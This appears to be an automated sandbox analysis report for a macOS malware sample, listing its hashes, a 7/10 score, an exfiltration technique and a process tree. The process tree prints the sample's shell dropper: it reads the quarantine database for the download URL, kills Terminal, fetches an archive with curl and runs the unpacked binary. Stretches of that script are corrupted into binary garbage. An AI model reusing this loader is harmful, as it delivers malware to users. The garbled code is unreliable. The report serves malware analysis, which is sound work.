Analysis

  • max time kernel
    44s
  • max time network
    153s
  • platform
    macos-10.15_amd64
  • resource
    macos-20241106-en
  • resource tags

    arch:amd64, arch:i386, image:macos-20241106-en, kernel:19b77a, locale:en-us, os:macos-10.15-amd64, system
  • submitted
    17/02/2025, 18:06

General

  • Target

    Macos-Malware-Samples-main/1442488066ece4b88832dd96945212d220b2fa5306b52790bafe059f46884d52

  • Size

    34KB

  • MD5

    e1f0b7c30cd044ca98c6f24caeff869f

  • SHA1

    1a1a35824946497e09b04e0ef4ab146e7ce3daea

  • SHA256

    1442488066ece4b88832dd96945212d220b2fa5306b52790bafe059f46884d52

  • SHA512

    3c4a31060f556f57e14e3f6108eaa1fd7167e33e214f52ece38cc72affa262be2f99986c0b95a70c4034d319c30a15a112db1cea92366649a45a22a1fd0de276

  • SSDEEP

    384:CMCyAH1ICtuL//Hk/eUlpEf0cotU2HguYZ5xVAvr+Q8qr3vFrh6rHskrNab8eri:DObtm3k/HipotXAuYZ3mp8uv75mab8z

Score
7/10

Malware Config

Signatures

  • Exfiltration Over Alternative Protocol 1 TTPs 1 IoCs

    Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

Processes

  • /bin/sh
    sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/1442488066ece4b88832dd96945212d220b2fa5306b52790bafe059f46884d52\""
    1⤵
      PID:490
    • /bin/bash
      sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/1442488066ece4b88832dd96945212d220b2fa5306b52790bafe059f46884d52\""
      1⤵
        PID:490
      • /usr/bin/sudo
        sudo /bin/zsh -c /Users/run/Macos-Malware-Samples-main/1442488066ece4b88832dd96945212d220b2fa5306b52790bafe059f46884d52
        1⤵
          PID:490
          • /bin/zsh
            /bin/zsh -c /Users/run/Macos-Malware-Samples-main/1442488066ece4b88832dd96945212d220b2fa5306b52790bafe059f46884d52
            2⤵
              PID:491
            • /Users/run/Macos-Malware-Samples-main/1442488066ece4b88832dd96945212d220b2fa5306b52790bafe059f46884d52
              /Users/run/Macos-Malware-Samples-main/1442488066ece4b88832dd96945212d220b2fa5306b52790bafe059f46884d52
              2⤵
                PID:491
            • /bin/sh
              sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#*\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]||[ \"\${param}\" == \"sidw\" ]||[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/m��ʘ�8�]���#������>�i�PȆ�����'�: Mb��Y�]��Hy����%�� `:{�����I������j�|���������V�R������2�G�M�og�y�˞Cr|���㜇��%j�}�D>��yp�A˚�j@���3+�h-�?���9|SGIV�/Od�k�Zp �����埈�����u3-�Wc=��o݄in�\\��*\$I��:�^FOh1�r+����}�jy}�%{4:_}� ���&:C�� �gF`�ݗ�~Br[�(�d��l5��g�S]�-�^���dq� �IQr@����>�*�.�E0�^�Sy��g;�\\����>��a�#R����hz? ;>��ոS�󘞽���C�Ǖ�\\}\":S��dq�C �n���/�%k<� XĹ(�����o��A�;�n!�&���H5KMr�'�#�s<a�(E�/?*);local -r binary_path=\"\${binary_paths[0]}\";echo \"\${binary_path}\";};exec_bin(){ local -r bin_path=\"\${1}\";local -r did=\"\${2}\";local -r app_path=\"\${3}\";[ -z \"\${bin_path}\" ]&&return;\"\${bin_path}\" -did \"\${did}\";};main(){ local -r url=\"\${1}\";close_terminal;local -r did=\"\$(extract_did)\";[ -z \"\${did}\" ]&&return;local -r tmp_dir=\"\$(/usr/bin/mktemp -d \"\$(temp_dir)\$(uuidgen)\")\";loca��R�?i��߭k\$q����Ǔ�_j6�e�%yn�G~�!�P�b���JF�l8‰�P2y�WZ��{���q���c��`<�n ٨Ы�F�:�(̣������}���:��Cb�!��!�k���n�DM�&Pn��홖��ݰ��� V�"
              1⤵
                PID:492
              • /bin/bash
                sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#*\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]||[ \"\${param}\" == \"sidw\" ]||[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/m��ʘ�8�]���#������>�i�PȆ�����'�: Mb��Y�]��Hy����%�� `:{�����I������j�|���������V�R������2�G�M�og�y�˞Cr|���㜇��%j�}�D>��yp�A˚�j@���3+�h-�?���9|SGIV�/Od�k�Zp �����埈�����u3-�Wc=��o݄in�\\��*\$I��:�^FOh1�r+����}�jy}�%{4:_}� ���&:C�� �gF`�ݗ�~Br[�(�d��l5��g�S]�-�^���dq� �IQr@����>�*�.�E0�^�Sy��g;�\\����>��a�#R����hz? ;>��ոS�󘞽���C�Ǖ�\\}\":S��dq�C �n���/�%k<� XĹ(�����o��A�;�n!�&���H5KMr�'�#�s<a�(E�/?*);local -r binary_path=\"\${binary_paths[0]}\";echo \"\${binary_path}\";};exec_bin(){ local -r bin_path=\"\${1}\";local -r did=\"\${2}\";local -r app_path=\"\${3}\";[ -z \"\${bin_path}\" ]&&return;\"\${bin_path}\" -did \"\${did}\";};main(){ local -r url=\"\${1}\";close_terminal;local -r did=\"\$(extract_did)\";[ -z \"\${did}\" ]&&return;local -r tmp_dir=\"\$(/usr/bin/mktemp -d \"\$(temp_dir)\$(uuidgen)\")\";loca��R�?i��߭k\$q����Ǔ�_j6�e�%yn�G~�!�P�b���JF�l8‰�P2y�WZ��{���q���c��`<�n ٨Ы�F�:�(̣������}���:��Cb�!��!�k���n�DM�&Pn��홖��ݰ��� V�"
                1⤵
                  PID:492

Network

MITRE ATT&CK Enterprise v15
